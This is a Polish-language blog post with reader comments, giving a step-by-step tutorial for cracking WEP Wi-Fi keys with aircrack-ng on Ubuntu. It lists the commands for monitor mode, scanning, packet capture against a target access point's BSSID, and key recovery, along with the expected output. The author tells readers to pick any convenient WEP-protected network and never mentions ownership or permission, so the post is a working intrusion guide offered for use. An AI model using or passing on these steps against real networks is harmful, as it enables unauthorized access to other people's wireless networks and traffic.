Jak złamać WEP?

Płeć:

Żyjący:

Data urodzenia:

Data śmierci:


W związku z częstymi zapytaniami "jak to zrobiłeś" związanych z postem Mnie też się udało… złamać WEP! postanowiłem jednak napisać jak to się robi… 

Co mam:

  1. Laptop wyposażony w kartę bezprzewodową Intel(R) PRO/Wireless 3945ABG/BG
  2. Linux Ubuntu 11.04 z jądrem 2.6.38-11-generic

Przygotowania:

  • otwieram terminal
  • loguję się jako administrator

sudo su  

  • instaluję aircrack-ng

apt-get install aircrack-ng

  • sprawdzam jak oznaczona jest moja karta WIFI

iwconfig

w moim przypadku jest to wlan0

  • Ustawiam kartę w tryb "mode monitor"  

airmon-ng start wlan0

w moim przypadku utworzył się nowy wirtualny infterfejs mon0

  • Wyszukujemy dogodnej sieci zabezpieczonej za pomocą WEP, lub jeśli takową mamy wyszukaną odczytujemy zeń informacje dotyczące:

  1. ESSID – nazwa sieci
  2. BSSID – adres MAC acces pointa (routera)
  3. CHANNEL – kanał na którym nadaje sieć.
  4. ewentualnie można spisać adresy MAC STATION – urządzeń podłączonych do tego samego punktu dostępowego. W chwili gdy sieć jest nieużywana będziemy mogli przyspieszyć cały proces.

Odczyt wykonujemy za pomocą polecenia:

airodump-ng mon0

airodump-ng mon0

Przechwytywanie pakietów:

Wiemy, że punkt dostępowy działa na kanale 1, jego BSSID zaczyna się na : 00:17:3F:XX:XX:XX aby zacząć przechwytywanie pakietów należy wydać polecenie:

airodump-ng –channel 1 –bssid 00:17:3F:XX:XX:XX –write kod mon0

gdzie:

  • –channel X wpisujemy numer kanału,
  • –bssid XX:XX:XX:XX:XX:XX wpisujemy BSSID punktu dostępowego,
  • –write X wpisujemy nazwę pliku w którym zapisane zostaną dane do późniejszej analizy,
  • mon0 to wcześniej wspomniana karta Wifi w trybie monitor mode. 

Łamanie WEP:

Uruchamiamy drugie okno terminala w którym wpisujemy polecenie:

aircrack-ng kod-01.cap

gdzie kod-01.cap to nazwa pliku z danymi do analizy. Aby sprawdzić pod jaką nazwą dokładnie zapisał się plik wystarczy wpisać polecenie:  

dir

teraz pozostaje nam czekać. Aircrack automatycznie zacznie proces łamania gdy tylko uzbieramy odpowiednią ilość danych. 

Na początku aircrack na pewno pokaże

Failed. Next try with 5000 IVs.

Należy dalej czekać. Może pokazać także żeby czekać do 10000 IVs i 15000 IVs. U mnie poszło dopiero przy 25000 IVs.

Jak pokaże się:

KEY FOUND! [ XX:XX:XX:XX:XX ] Decrypted correctly: 100%

Oznacza, że program złamał WEP do wybranej przez nas sieci.  

Bookmark the permalink.

4 thoughts on “Jak złamać WEP?

  1. Pingback: sasni.eu

  2. Prawie mi wyszlo, korzystam z roznych poradnikow. Tylko ze ciagle wyskakuje mi komenda przy aircrack:

    bash: aircrack: command not found
    I juz nie mam pomyslow jak to ogarnac.

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *